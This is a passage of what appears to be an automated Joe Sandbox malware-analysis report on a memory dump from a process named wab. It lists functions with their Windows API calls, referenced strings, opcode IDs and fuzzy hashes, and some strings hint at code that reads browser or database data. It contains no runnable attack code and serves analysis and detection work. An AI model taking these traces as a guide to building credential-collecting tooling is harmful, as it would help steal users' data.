                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040D8BD
                                                                                                                                                                                                                          • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                                                                                                                          • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040D906
                                                                                                                                                                                                                          • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                                                                                                                            • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                                                                                                                            • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                                                                                          • String ID: sysdatetimepick32
                                                                                                                                                                                                                          • API String ID: 1028950076-4169760276
                                                                                                                                                                                                                          • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                                                                                          • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                                                          • String ID: -journal$-wal
                                                                                                                                                                                                                          • API String ID: 438689982-2894717839
                                                                                                                                                                                                                          • Opcode ID: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                                                                                                                                                                                                          • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                                                                                                                                          • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                                                                                                                                            • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                                                                                                                                            • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                                                                                                                                          • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Item$Dialog$MessageSend
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3975816621-0
                                                                                                                                                                                                                          • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                                                          • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                                                                                                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                                                            • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                                                                                                                          • String ID: .save$http://$https://$log profile$signIn
                                                                                                                                                                                                                          • API String ID: 1214746602-2708368587
                                                                                                                                                                                                                          • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                                                                                                                          • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2313361498-0
                                                                                                                                                                                                                          • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                                                                                                                                                                                          • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                                                                                                                                          • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                                                                                                                                          • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                                                                                                                                            • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                                                                                                                                          • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$ItemMessageRectSend$Client
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2047574939-0
                                                                                                                                                                                                                          • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                                                                                                          • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4218492932-0
                                                                                                                                                                                                                          • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                                                          • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                                                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                                                            • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                                                                                                                                                                                                            • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0044A8BF
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0044A90C
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0044A988
                                                                                                                                                                                                                            • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                                                                                                                                                                                                            • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0044A9D8
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0044AA19
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0044AA4A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                                                          • String ID: gj
                                                                                                                                                                                                                          • API String ID: 438689982-4203073231
                                                                                                                                                                                                                          • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                                                          • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                                          • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                                                                                                                                          • API String ID: 3510742995-2446657581
                                                                                                                                                                                                                          • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                                                                          • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00405ABB
                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                                                                                                                                          • SetFocus.USER32(?), ref: 00405B76
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4281309102-0
                                                                                                                                                                                                                          • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                                                                                                                          • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _snwprintfwcscat
                                                                                                                                                                                                                          • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                                                          • API String ID: 384018552-4153097237
                                                                                                                                                                                                                          • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                                                                                                                          • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                                                                                          • String ID: 0$6
                                                                                                                                                                                                                          • API String ID: 2029023288-3849865405
                                                                                                                                                                                                                          • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                                                                                          • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00405455
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040546C
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00405483
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00405498
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 004054AD
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$memcpy$ErrorLast
                                                                                                                                                                                                                          • String ID: 6$\
                                                                                                                                                                                                                          • API String ID: 404372293-1284684873
                                                                                                                                                                                                                          • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                                                                                          • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                                                                                                          • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                                                                                                          • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1331804452-0
                                                                                                                                                                                                                          • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                                                                          • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                          • String ID: advapi32.dll
                                                                                                                                                                                                                          • API String ID: 2012295524-4050573280
                                                                                                                                                                                                                          • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                                                                                                                                          • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • <%s>, xrefs: 004100A6
                                                                                                                                                                                                                          • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                                                                                                          • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$_snwprintf
                                                                                                                                                                                                                          • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                                                          • API String ID: 3473751417-2880344631
                                                                                                                                                                                                                          • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                                                                                          • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                                                                          • String ID: %2.2X
                                                                                                                                                                                                                          • API String ID: 2521778956-791839006
                                                                                                                                                                                                                          • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                                                                          • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
